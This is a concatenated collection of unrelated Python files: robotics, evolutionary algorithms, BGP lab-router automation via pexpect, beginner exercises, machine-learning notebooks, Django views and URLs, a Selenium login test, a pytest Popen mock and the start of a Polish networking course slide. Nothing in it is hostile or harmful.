                # Generate the target pose/path for this cycle.
                target = self._robot_node[robot_id].get_action(
                    self._decoded_referee,
                    self._obstacle_avoidance,
                    self._ball_info,
                    self._robot_info,
                    defense_num)
            self._pubs_control_target[robot_id].publish(target)
def main():
    """Entry point: spin the game node at 60 Hz until ROS shuts down."""
    rospy.init_node('game')
    node = Game()
    rate = rospy.Rate(60)
    while not rospy.is_shutdown():
        node.update()
        rate.sleep()


if __name__ == '__main__':
    main()
|
'''
Cross over operators for evolutionary algorithms
'''
import numpy as np
from abc import ABC, abstractmethod
class AbstractCrossoverOperator(ABC):
    """Interface for crossover operators that combine two parent genomes."""
    @abstractmethod
    def crossover(self, parent_a, parent_b):
        """Return two children derived from *parent_a* and *parent_b*."""
        pass
class PartiallyMappedCrossover(AbstractCrossoverOperator):
    '''
    Partially Mapped Crossover (PMX) operator for permutation genomes.
    '''
    def __init__(self):
        pass
    def crossover(self, parent_a, parent_b):
        """Produce two children, each seeded from one parent and crossed with the other."""
        return (self._pmx(parent_a.copy(), parent_b),
                self._pmx(parent_b.copy(), parent_a))
    def _pmx(self, child, parent_to_cross):
        """Swap genes of *child* in place so a random slice mirrors *parent_to_cross*."""
        lo, hi = np.sort(np.random.randint(0, len(child), size=2))
        for pos in range(lo, hi):
            gene = parent_to_cross[pos]
            # Locate where *gene* currently sits in the child and swap it in.
            other = np.where(child == gene)[0][0]
            child[pos], child[other] = child[other], child[pos]
        return child
|
import time
import pexpect
import execute
import Devices
import clear_buffer
import getdata
class IBGP:
    """Configure BGP features on lab routers through interactive CLI sessions.

    Public methods open a console via Devices.Devices().connect() (or a
    telnet session to quagga's bgpd daemon for 'zebra' devices), sync the
    prompt, then push newline-separated IOS-style configuration blocks
    with execute.execute().  They return True when a session could be
    opened and False otherwise; they do not verify that the device
    accepted the commands.
    """

    def _open_cli(self, Device):
        """Open *Device*'s console and sync its prompt.

        Returns (child, flag): the pexpect child and the expect() index
        (0/2 = user-exec prompt, already elevated here via Dev.Login;
        1/3 = privileged prompt; 4/5 = EOF/timeout).  Returns
        (None, None) when the connection failed.
        """
        device_data = getdata.get_data()
        hostname = device_data['Device_Details'][Device]['Hostname']
        Dev = Devices.Devices()
        child = Dev.connect(Device)
        if not child:
            return None, None
        clear_buffer.flushBuffer(1, child)
        child.sendcontrol('m')
        child.sendcontrol('m')
        child.sendcontrol('m')
        flag = child.expect([hostname+'>', hostname+'#', 'Router\>', 'Router\#',
                             pexpect.EOF, pexpect.TIMEOUT], timeout=90)
        if flag in (0, 2):
            # User-exec prompt: authenticate up to privileged mode first.
            Dev.Login(Device, child)
        return child, flag

    def _open_bgpd(self, Device):
        """Telnet to *Device*'s quagga bgpd daemon and raise privilege.

        Sends the default 'zebra' vty password when prompted, then
        'enable'.  Returns the pexpect child; callers still wait for the
        'bgpd#' prompt before pushing configuration.
        """
        device_data = getdata.get_data()
        IP_add = device_data['Device_Details'][Device]['ip_add']
        child = pexpect.spawn('telnet ' + IP_add + ' ' + 'bgpd')
        clear_buffer.flushBuffer(1, child)
        child.sendcontrol('m')
        flag = child.expect(['bgpd*', 'Password*',
                             pexpect.EOF, pexpect.TIMEOUT], timeout=100)
        if flag == 1:
            child.send('zebra')
            child.sendcontrol('m')
            flag = child.expect(['bgpd*>', pexpect.EOF,
                                 pexpect.TIMEOUT], timeout=50)
            if flag == 0:
                child.send('enable')
                child.sendcontrol('m')
        return child

    def _push(self, child, config_block):
        """Split *config_block* on newlines and run it on the device.

        Leading whitespace in each command line is tolerated by the
        IOS/quagga CLI, so the templates keep their source indentation.
        """
        commands = config_block.split('\n')
        execute.execute(child, commands)

    def Configure_IBGP(self, Device, AS_id, Interface, Action):
        """Configure (or remove) iBGP peering on *Device*.

        Device    -- inventory key of the router.
        AS_id     -- local AS number (int).
        Interface -- one neighbor address, or a list of them.
        Action    -- 'enable' adds the neighbors; any other value removes
                     the whole BGP process.
        Returns True when a console session was opened, False otherwise.
        """
        child, flag = self._open_cli(Device)
        if not child:
            return False
        if flag in (0, 1, 2, 3):
            if Action == 'enable':
                many = isinstance(Interface, list)
                for interface in (Interface if many else [Interface]):
                    configs = """
                    configure terminal
                    router bgp %d
                    neighbor %s remote-as %d
                    neighbor %s update-source loopback 0
                    exit
                    exit
                    """ % (AS_id, interface, AS_id, interface)
                    self._push(child, configs)
                    if many:
                        # Give the device time to settle between neighbors.
                        time.sleep(6)
                        child.sendcontrol('m')
                        child.sendline('exit')
                        child.sendcontrol('m')
                    else:
                        child.sendcontrol('m')
            else:
                unconfig = """
                configure terminal
                no router bgp %d
                exit
                exit
                """ % (AS_id)
                # BUG FIX: the original split the undefined name `configs`
                # here, raising NameError on every disable request.
                self._push(child, unconfig)
                child.sendcontrol('m')
        return True

    def enable_syn(self, Device, AS_id):
        """Enable BGP synchronization under `router bgp AS_id` on *Device*."""
        child, flag = self._open_cli(Device)
        if not child:
            return False
        if flag in (0, 1, 2, 3):
            configs = """
            configure terminal
            router bgp %d
            synchronization
            end
            """ % (AS_id)
            self._push(child, configs)
            child.sendcontrol('m')
        return True

    def Configure_EBGP(self, Device, AS_id, Interface, neighbor_AS_id, Action, NW_id, Mask):
        """Configure (or remove) eBGP peering on *Device* and advertise NW_id.

        Handles both regular IOS devices and quagga/zebra bgpd daemons
        (selected by the device's configured 'port' entry).  For quagga
        the `network` statement takes no mask argument.
        Returns True when a session was opened, False otherwise.
        """
        device_data = getdata.get_data()
        port = device_data['Device_Details'][Device]['port']
        if port != "zebra":
            child, flag = self._open_cli(Device)
            if not child:
                return False
            if flag in (0, 1, 2, 3):
                if Action == 'enable':
                    many = isinstance(Interface, list)
                    for interface in (Interface if many else [Interface]):
                        configs = """
                        configure terminal
                        router bgp %d
                        neighbor %s remote-as %d
                        network %s mask %s
                        exit
                        exit
                        """ % (AS_id, interface, neighbor_AS_id, NW_id, Mask)
                        self._push(child, configs)
                        if many:
                            time.sleep(6)
                            child.sendcontrol('m')
                            child.sendline('exit')
                            child.sendcontrol('m')
                        else:
                            child.sendcontrol('m')
                else:
                    unconfig = """
                    configure terminal
                    no router bgp %d
                    exit
                    exit
                    """ % (AS_id)
                    self._push(child, unconfig)
                    child.sendcontrol('m')
            return True
        # quagga/zebra device: configure through the bgpd daemon instead.
        child = self._open_bgpd(Device)
        if not child:
            return False
        flag = child.expect(['bgpd#*', pexpect.EOF, pexpect.TIMEOUT], timeout=90)
        if flag == 0:
            Devices.Devices().Login(Device, child)
            if Action == 'enable':
                many = isinstance(Interface, list)
                for interface in (Interface if many else [Interface]):
                    configs = """
                    configure terminal
                    router bgp %d
                    neighbor %s remote-as %d
                    network %s
                    exit
                    exit
                    """ % (AS_id, interface, neighbor_AS_id, NW_id)
                    self._push(child, configs)
                    if many:
                        time.sleep(6)
                        child.sendcontrol('m')
                        child.sendline('exit')
                        child.sendcontrol('m')
                    else:
                        child.sendcontrol('m')
            else:
                unconfig = """
                configure terminal
                no router bgp %d
                exit
                exit
                """ % (AS_id)
                self._push(child, unconfig)
                child.sendcontrol('m')
        return True

    def advertising_loopback(self, Device, AS_id, Interface, mask):
        """Advertise network *Interface*/*mask* under `router bgp AS_id`."""
        child, flag = self._open_cli(Device)
        if not child:
            return False
        if flag in (0, 1, 2, 3):
            configs = """
            configure terminal
            router bgp %d
            network %s mask %s
            end
            """ % (AS_id, Interface, mask)
            self._push(child, configs)
            child.sendcontrol('m')
        return True

    def redistribution(self, Device, AS_id, Process_id=None):
        """Mutually redistribute BGP *AS_id* and OSPF *Process_id* on *Device*."""
        child, flag = self._open_cli(Device)
        if not child:
            return False
        if flag in (0, 1, 2, 3):
            configs = """
            configure terminal
            router bgp %d
            redistribute ospf %d
            exit
            router ospf %d
            redistribute bgp %d subnets
            end
            """ % (AS_id, Process_id, Process_id, AS_id)
            self._push(child, configs)
            child.sendcontrol('m')
        return True

    def route(self, Device, AS_id, Interface):
        """Set `neighbor Interface next-hop-self` under `router bgp AS_id`."""
        child, flag = self._open_cli(Device)
        if not child:
            return False
        if flag in (0, 1, 2, 3):
            configs = """
            configure terminal
            router bgp %d
            neighbor %s next-hop-self
            end
            """ % (AS_id, Interface)
            self._push(child, configs)
            child.sendcontrol('m')
        return True

    def redistribution_connected(self, Device, AS_id):
        """Enable `redistribute connected` under `router bgp AS_id` on *Device*.

        Supports both IOS devices and quagga/zebra bgpd daemons.
        """
        device_data = getdata.get_data()
        port = device_data['Device_Details'][Device]['port']
        if port != "zebra":
            child, flag = self._open_cli(Device)
            if not child:
                return False
            if flag in (0, 1, 2, 3):
                configs = """
                configure terminal
                router bgp %d
                redistribute connected
                end
                """ % (AS_id)
                self._push(child, configs)
                child.sendcontrol('m')
            return True
        # quagga/zebra device: configure through the bgpd daemon.
        child = self._open_bgpd(Device)
        if not child:
            return False
        clear_buffer.flushBuffer(1, child)
        child.sendcontrol('m')
        child.sendcontrol('m')
        child.sendcontrol('m')
        flag = child.expect(['bgpd#*', pexpect.EOF, pexpect.TIMEOUT], timeout=90)
        # BUG FIX: the original also pushed configuration when flag was 1
        # (EOF) -- a copy-paste from the four-pattern prompt list.  Only a
        # matched 'bgpd#' prompt should proceed.
        if flag == 0:
            Devices.Devices().Login(Device, child)
            configs = """
            configure terminal
            router bgp %d
            redistribute connected
            end
            """ % (AS_id)
            self._push(child, configs)
            child.sendcontrol('m')
        return True
|
import math
v = float(input('Digite um ângulo: '))
# BUG FIX: math.sin/cos/tan take radians, but the prompt and the printed
# 'º' indicate the user enters degrees -- convert before computing.
rad = math.radians(v)
s = math.sin(rad)
c = math.cos(rad)
t = math.tan(rad)
print('O valor {}º corresponde aos valores: \nSeno {:.3f} \nCosseno {:.3f} \nTangente {:.3f}'.format(v, s, c, t))
|
# coding: utf-8
# ### SVM with scikit-learn
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
# In[3]:
# This SVM example only handles binary classification, so keep just two
# of the three iris classes (and the first two features for 2-D plots).
from sklearn import datasets
iris = datasets.load_iris()
X = iris.data
y = iris.target
X = X[y < 2, :2]
y = y[y < 2]
# In[22]:
plt.scatter(X[y==0, 0], X[y==0, 1], color='r')
plt.scatter(X[y==1, 0], X[y==1, 1], color='b')
plt.show()
# In[5]:
# Standardize the features before fitting the scale-sensitive linear SVM.
from sklearn.preprocessing import StandardScaler
standardScaler = StandardScaler()
standardScaler.fit(X)
X_standard = standardScaler.transform(X)
# In[6]:
from sklearn.svm import LinearSVC
svc = LinearSVC(C=1e9)  # very large C: close to a hard-margin SVM
svc.fit(X_standard, y)
# In[7]:
# Helper function that draws a model's decision boundary (defined below).
def plot_decision_boundary(model, axis):
    """Plot *model*'s predicted class regions over axis=[xmin, xmax, ymin, ymax].

    Samples the rectangle on a grid of ~100 points per unit, predicts the
    class of every grid point, and draws the regions with contourf.
    """
    x0, x1 = np.meshgrid(
        np.linspace(axis[0], axis[1], int((axis[1]-axis[0])*100)).reshape(-1, 1),
        np.linspace(axis[2], axis[3], int((axis[3]-axis[2])*100)).reshape(-1, 1)
    )
    X_new = np.c_[x0.ravel(), x1.ravel()]
    y_predict = model.predict(X_new)
    zz = y_predict.reshape(x0.shape)
    from matplotlib.colors import ListedColormap
    custom_cmap = ListedColormap(['#EF9A9A', '#FFF59D', '#90CAF9'])
    # BUG FIX: 'linewidth' is not a valid kwarg for contourf (filled
    # regions have no line width) and newer matplotlib rejects it.
    plt.contourf(x0, x1, zz, cmap=custom_cmap)
# In[9]:
# Decision regions of the near-hard-margin model (C=1e9).
plot_decision_boundary(svc, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
# In[24]:
# A much smaller C tolerates more margin violations (softer margin).
svc2 = LinearSVC(C=0.01)
svc2.fit(X_standard, y)
# In[25]:
plot_decision_boundary(svc2, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
# In[26]:
svc.coef_  # fitted weight vector w
# In[27]:
svc.intercept_  # fitted bias b
# In[28]:
def plot_svc_decision_boundary(model, axis):
    """Plot a linear SVC's decision regions plus its two margin lines.

    axis = [xmin, xmax, ymin, ymax].  The margins are computed from the
    fitted coefficients, so *model* must expose coef_ and intercept_.
    """
    x0, x1 = np.meshgrid(
        np.linspace(axis[0], axis[1], int((axis[1]-axis[0])*100)).reshape(-1, 1),
        np.linspace(axis[2], axis[3], int((axis[3]-axis[2])*100)).reshape(-1, 1)
    )
    X_new = np.c_[x0.ravel(), x1.ravel()]
    y_predict = model.predict(X_new)
    zz = y_predict.reshape(x0.shape)
    from matplotlib.colors import ListedColormap
    custom_cmap = ListedColormap(['#EF9A9A', '#FFF59D', '#90CAF9'])
    # BUG FIX: 'linewidth' is not a valid contourf kwarg (filled regions
    # have no line width); newer matplotlib rejects it.
    plt.contourf(x0, x1, zz, cmap=custom_cmap)
    w = model.coef_[0]
    b = model.intercept_[0]
    # Decision boundary: w0*x0 + w1*x1 + b = 0  ->  x1 = -w0/w1*x0 - b/w1
    plot_x = np.linspace(axis[0], axis[1], 200)
    # Upper support line: w0*x0 + w1*x1 + b = 1  ->  x1 = -w0/w1*x0 - b/w1 + 1/w1
    up_y = -w[0]/w[1] * plot_x - b/w[1] + 1/w[1]
    # Lower support line: w0*x0 + w1*x1 + b = -1 ->  x1 = -w0/w1*x0 - b/w1 - 1/w1
    down_y = -w[0]/w[1] * plot_x - b/w[1] - 1/w[1]
    # Only draw the margin points that fall inside the requested y-range.
    up_index = (up_y >= axis[2]) & (up_y <= axis[3])
    down_index = (down_y >= axis[2]) & (down_y <= axis[3])
    plt.plot(plot_x[up_index], up_y[up_index], color='black')
    plt.plot(plot_x[down_index], down_y[down_index], color='black')
# In[29]:
# Margins of the near-hard-margin model: few points inside the margin.
plot_svc_decision_boundary(svc, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
# In[30]:
# Margins of the soft model (C=0.01): a much wider margin band.
plot_svc_decision_boundary(svc2, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
|
from dicelib import dice
# Roll five dice and print the total.
dice_list = []
for _ in range(0, 5):
    new_dice = dice.Dice()
    new_dice.roll()
    dice_list.append(new_dice)
# NOTE(review): sum() over Dice objects only works if Dice implements
# __radd__/__add__ with ints; otherwise this should collect and sum the
# roll results instead.  Confirm against the dicelib API.
print(sum(dice_list))
|
# 1. Basic - Print all integers from 0 to 150.
for i in range(0, 151):
    print(i)

# 2. Multiples of Five - Print all the multiples of 5 from 5 to 1,000.
# BUG FIX: the original looped up to 10,000 instead of 1,000; stepping
# by 5 also avoids testing every integer.
for i in range(5, 1001, 5):
    print(i)

# 3. Counting, the Dojo Way - Print integers 1 to 100. If divisible by 5,
# print "Coding" instead. If divisible by 10, print "Coding Dojo".
# BUG FIX: the original used two independent ifs, so multiples of 5
# printed both "Coding" and the number, and multiples of 10 printed
# both strings; an if/elif/else chain prints exactly one line each.
for i in range(1, 101):
    if i % 10 == 0:
        print("Coding Dojo")
    elif i % 5 == 0:
        print("Coding")
    else:
        print(i)

# 4. Whoa. That Sucker's Huge - Add odd integers from 0 to 500,000, and print the final sum.
total = 0  # renamed from `sum` to avoid shadowing the builtin
for i in range(1, 500000, 2):  # the odd integers below 500,000
    total = total + i
print(total)

# 5. Countdown by Fours - Print positive numbers starting at 2018, counting down by fours.
for i in range(2018, 0, -4):
    print(i)

# 6. Flexible Counter - From lowNum through highNum, print only the
# integers that are a multiple of mult.
lowNum = 2
highNum = 10
mult = 2
for i in range(lowNum, highNum + 1):
    if i % mult == 0:
        print(i)
|
import os
import sys
import json
import os.path
import requests as req
import numpy as np
import pandas as pd
from surprise import Dataset
from surprise import Reader, Dataset, SVD
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from joblib import (load, dump)
from tensorflow.keras.models import (Model, load_model)
from util import *
from personal.eda import *
from personal.svd import *
from personal.nn import *
from trending.demographic import *
from history.becauseyouwatched import *
# Module-level data loaded once at import: movie metadata and credits CSVs.
movie_df = pd.read_csv(os.path.join(os.path.dirname(__file__), "../", "input", "movies_metadata.csv"))
movie_credits_df = pd.read_csv(os.path.join(os.path.dirname(__file__), "../", "input", "credits.csv"))
user_ratings_ds = get_ratings_small()
# SVD recommender built/loaded once at import time.
SVD_MODEL = generate_model_svd()
def get_trending_movies():
    """Return the top-10 trending movies (by demographic) as a JSON records string."""
    # Build the top-10 list, then decorate it for the API response.
    top = get_top_k_movies(10)
    top = append_imdb_id_to_df(top)
    top = format_data_objects(top)
    top = top.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
    return top.to_json(orient='records')
def get_top_10_similar(movie_id, use_overview_for_similarity=False):
    """Given a movie id, return the top 10 similar movies as JSON records."""
    # Resolve the seed movie's title from its id.
    seed = get_movies_from_ids([int(movie_id)])
    seed_title = str(seed['title'].item())
    # Similarity is computed on the metadata "soup" for the seed title.
    similar_titles = get_k_recommendations_based_on_soup(seed_title, 10).tolist()
    ds = get_movies_dataset()
    similar_ids = [int(get_movie_id_by_title(ds, str(t))) for t in similar_titles]
    result = format_data_objects(get_movies_from_ids(similar_ids))
    result = result.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
    result = append_imdb_id_to_df(result)
    return result.to_json(orient='records')
def get_rating(user_id):
    """
    Get top 10 most highly rated movies based on user's watch history
    Uses the pre-trained neural network
    """
    top_scores = get_top_scores(user_id, 10)
    # Each entry's first element is the movie id.
    movie_ids = [entry[0] for entry in top_scores]
    frame = format_data_objects(get_movies_from_ids(movie_ids))
    frame = frame.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
    return append_imdb_id_to_df(frame).to_json(orient='records')
def get_rating_svd(user_id):
    """
    Get top 10 most highly rated movies based on user's watch history
    Uses the SVD model
    """
    prediction = get_top_k_predictions(get_all_predictions_svd(user_id), 10)
    # FIX: removed a leftover debug print of prediction[0][0].
    # NOTE(review): ids are taken from index 1 of each prediction entry
    # (get_rating uses index 0 of its source) -- confirm the tuple layout.
    moviel = [x[1] for x in prediction]
    movie = format_data_objects(get_movies_from_ids(moviel))
    movies = movie.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
    return append_imdb_id_to_df(movies).to_json(orient='records')
def get_movie_by_id(movie_id):
    """Return one movie (with poster/trailer and imdb id) as a JSON records string."""
    mids = []
    mids.append(int(movie_id))
    movie = format_data_objects(get_movies_from_ids(mids))
    # NOTE(review): other call sites pass get_trailer=True as a keyword via
    # DataFrame.apply; here the frame and True are passed positionally --
    # confirm get_movie_poster_and_trailer accepts this calling convention.
    movie = get_movie_poster_and_trailer(movie, True)
    return append_imdb_id_to_df(movie).to_json(orient='records')
if __name__ == "__main__":
print(get_rating(12, 862)) |
"""Pytest plugin that mocks subprocess.Popen."""
import subprocess
import pytest
from .creplay import load_log
class PopenController:
    """Controller for mocking subprocess.Popen.

    Commands present in the active replay log are rerouted through the
    `creplay` tool; unknown commands either raise (strict mode) or fall
    through to the real Popen.
    """
    # Path to the currently active replay log.
    log_path = ''
    # Set of commands supported by current replay log.
    commands = set()  # type: ignore
    # Strict mode (any command not in the log will cause AssertionError).
    strict = True
    real_popen = subprocess.Popen

    @classmethod
    def set_replay_log(cls, log_path, strict=True):
        cls.log_path = log_path
        cls.commands = set(load_log(log_path))
        cls.strict = strict

    @classmethod
    def set_strict(cls, strict):
        cls.strict = strict

    @classmethod
    def clear_replay_log(cls):
        cls.log_path = ''
        cls.commands = set()

    @classmethod
    def popen(cls, cmd, *args, **kw):
        joined = ' '.join(cmd)
        if joined in cls.commands:
            # Known command: replay its recorded behavior via creplay.
            replay_cmd = ['creplay', '-l', cls.log_path, '--'] + cmd
            return cls.real_popen(replay_cmd, *args, **kw)
        if cls.strict:
            raise AssertionError('Unexpected command: ' + joined)
        return cls.real_popen(cmd, *args, **kw)
@pytest.fixture
def popen_controller(monkeypatch):
    """Controller for subprocess.Popen.

    Replaces subprocess.Popen with PopenController.popen for the duration
    of the test, then clears any replay log the test configured.
    """
    monkeypatch.setattr(subprocess, 'Popen', PopenController.popen)
    yield PopenController
    PopenController.clear_replay_log()
|
# (Earlier scratch examples -- variable basics, input(), and the
# ecommerce shipping import -- removed; they were all commented out.)
from pathlib import Path

# Print every entry in the current working directory.
# Note: glob('*') is kept (rather than iterdir()) so hidden dot-files
# stay excluded, matching the original behavior.
current_dir = Path()
for entry in current_dir.glob('*'):
    print(entry)
|
class Soccer:
    def maxPoints(self, wins, ties):
        """Return the best team score: 3 points per win plus 1 per tie.

        BUG FIX: the original used a Python-2 tuple-parameter lambda
        (`lambda (w, t): ...`), which is a SyntaxError in Python 3.
        """
        return max(3 * w + t for w, t in zip(wins, ties))
|
from django.urls import path
from .views import HomeView, ListaErroresView, ConfigurarBaseView, PaletaView
from .views import ColoresView, OtrosView, ConfigurarModeloNuevaView
from .views import EditarReporteView
from .views import ConfigurarUpdateContiguoView, ConfigurarUpdateAbajoView, ConfigurarBorraView, ConfigurarBaseNuevaView
from .views import CrearPasosView
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required

# URL patterns for the 'crear' app namespace; every view requires login.
crear_patterns = ([
    path('crear/', login_required(HomeView.as_view()), name='home'),
    path('lista/', login_required(ListaErroresView.as_view()), name='lista'),
    path('conf_base/', login_required(ConfigurarBaseView.as_view()), name='conf_base'),
    path('conf_base_nueva/', login_required(ConfigurarBaseNuevaView.as_view()), name='conf_base_nueva'),
    path('paleta/', login_required(PaletaView.as_view()), name='paleta'),
    path('colores/', login_required(ColoresView.as_view()), name='colores'),
    path('otros/', login_required(OtrosView.as_view()), name='otros'),
    path('conf_modelo/', login_required(ConfigurarModeloNuevaView.as_view()), name='conf_modelo'),
    path('conf_update_contiguo/', login_required(ConfigurarUpdateContiguoView.as_view()), name='conf_update_contiguo'),
    path('conf_update_abajo/', login_required(ConfigurarUpdateAbajoView.as_view()), name='conf_update_abajo'),
    path('conf_borra/', login_required(ConfigurarBorraView.as_view()), name='conf_borra'),
    path('crear_pasos/', login_required(CrearPasosView.as_view()), name='crear_pasos'),
    path('reporte/<int:pk>/', login_required(EditarReporteView.as_view()), name='reporte'),
], 'crear')
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 10 22:50:22 2019

@author: anirbanhp

Train a scikit-learn MLP on MNIST and plot its training loss curve.
"""
from load_mnist import *
import matplotlib.pyplot as plt
import numpy
from sklearn.neural_network import MLPClassifier

X_train, y_train = load_mnist('training' )
X_test, y_test = load_mnist('testing' )
# Flatten each image into a single feature vector.
X_train = np.reshape(X_train, (X_train.shape[0], -1))
X_test = np.reshape(X_test, (X_test.shape[0], -1))

mlp = MLPClassifier(hidden_layer_sizes=(100,), max_iter=10, alpha=1e-4,
                    solver='sgd', verbose=10, tol=1e-4, random_state=1,
                    learning_rate_init=.1)
mlp.fit(X_train, y_train)
# BUG FIX: MLPClassifier.fit returns the estimator itself, not a
# Keras-style history dict, so data['loss'] / data['val_loss'] raised
# TypeError.  The per-iteration training loss is in mlp.loss_curve_;
# no validation loss is recorded without early_stopping.
plt.plot(mlp.loss_curve_)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('iterations')
plt.legend(['train'], loc='upper left')
plt.show()
#coding=utf-8
# Smoke test: open the site, click the login link, fill in credentials,
# submit, then quit the browser.
# NOTE(review): the selectors (tang-pass-login, TANGRAM__PSP_8__submit) look
# like Baidu's login widget while the URL is cnsuning — confirm they match
# the actual page before relying on this script.
from selenium import webdriver
import time
import os
driver = webdriver.Chrome()
driver.get("http://zpre.cnsuning.com")
# "登录" is the login link's visible text (runtime string, left untouched).
driver.find_element_by_link_text("登录").click()
time.sleep(10)  # crude wait for the login widget to render
div = driver.find_element_by_class_name("tang-pass-login").find_element_by_name("userName")
div.send_keys("username")
driver.find_element_by_name("password").send_keys("password")
driver.find_element_by_id("TANGRAM__PSP_8__submit").click()
driver.quit()
|
import json
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
def index(request):
    """Render the demo landing page."""
    return render(request, 'demo/index.html')
def deal_get(request):
    """Echo GET parameter 'key1' back as a JSON payload.

    Responds 405 for any other HTTP method; previously the function fell
    through and returned None, which Django rejects with a server error.
    """
    if request.method == 'GET':
        value = request.GET['key1']  # missing key -> 500, as before
        context = {'key': value, 'method': 'get'}
        return HttpResponse(json.dumps(context))
    return HttpResponse(status=405)
def deal_post(request):
    """Echo POST parameter 'key1' back as a JSON payload.

    Responds 405 for any other HTTP method; previously the function fell
    through and returned None, which Django rejects with a server error.
    """
    if request.method == 'POST':
        value = request.POST['key1']  # missing key -> 500, as before
        context = {'key': value, 'method': 'post'}
        return HttpResponse(json.dumps(context))
    return HttpResponse(status=405)
|
"""
Generate Phone Number w/Area Code
For each person in the dictionary below, insert a
randomly generated phone number. Make sure to use
these SPECS:
- Should be a string in this format: 1-718-786-2825
- Must randomly choose one of these area codes: 646, 718, 212
Hint: Another function from the random module might be useful
"""
from random import choice, randint

# Every entry starts with the US country prefix; the loop below appends a
# random area code and a random 7-digit local number (1-XXX-XXX-XXXX).
people = {
    'Melody': '1-',
    'Sergei': '1-',
    'Brandon': '1-',
    'Leo': '1-',
    'Priscilla': '1-'
}

for name in list(people):
    number = people[name]
    number += choice(['646', '718', '212'])
    number += f"-{randint(100,999)}-{randint(1000,9999)}"
    people[name] = number
    print(f'{name}: {number}')
|
# Copyright (c) 2020-2021 Matematyka dla Ciekawych Świata (http://ciekawi.icm.edu.pl/)
# Copyright (c) 2020-2021 Robert Ryszard Paciorek <rrp@opcode.eu.org>
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Accumulate slide/console-cast entries across included fragments: reuse an
# existing clipData list if a previous fragment defined it, else start fresh.
try: clipData
except NameError: clipData = []
code_ipa_output=r"""1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether f4:13:04:4e:17:e8 brd ff:ff:ff:ff:ff:ff
inet 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0
valid_lft 63549sec preferred_lft 63549sec
inet6 2001:0db8::6411:f613:4ff:fe4e:17e8/64 scope global dynamic mngtmpaddr
valid_lft 1775sec preferred_lft 575sec
inet6 fe80::f613:4ff:fe4e:17e8/64 scope link
valid_lft forever preferred_lft forever
"""
code_ipa_output2=r"""1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether f4:13:04:4e:17:e8 brd ff:ff:ff:ff:ff:ff
inet 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0
valid_lft 63549sec preferred_lft 63549sec
inet 10.0.71.113/20 scope global enp1s0
valid_lft forever preferred_lft forever
inet6 2001:0db8::6411:f613:4ff:fe4e:17e8/64 scope global dynamic mngtmpaddr
valid_lft 1775sec preferred_lft 575sec
inet6 fe80::f613:4ff:fe4e:17e8/64 scope link
valid_lft forever preferred_lft forever
"""
code_ipr_output2=r"""default via 192.168.6.1 dev eth0
10.0.64.0/20 dev eth0 proto kernel scope link src 10.0.1.0
192.168.6.0/24 dev eth0 proto kernel scope link src 192.168.6.3
"""
clipData += [
{ 'title': [ "#11.3", "Konfiguracja", "sieci", "" ] },
{ 'comment': 'konfiguracja - ip ifconfig ...' },
{
'image': [
[0.0, eduMovie.convertFile('polecenie_ip_1.tex', negate=True)],
],
'text' : [
'Obecnie podstawową komendą służącą do konfiguracji interfejsów sieciowych <m> w systemach Linux, ale niekoniecznie w innych Unix’ach jest polecenie ip. <m>'
'Komenda ta przyjmuje w linii poleceń ciągi argumentów określające <m> jakie akcje ma wykonać i na jakim zbiorze ustawień ma je wykonać. <m>'
'Pierwszy argument określa właśnie ten zbiór i mogą to być ustawienia <m> takie jak adresy, trasy routingowe, interfejsy L2, interfejsy tunelowe, <itd>[i te de]. <m>'
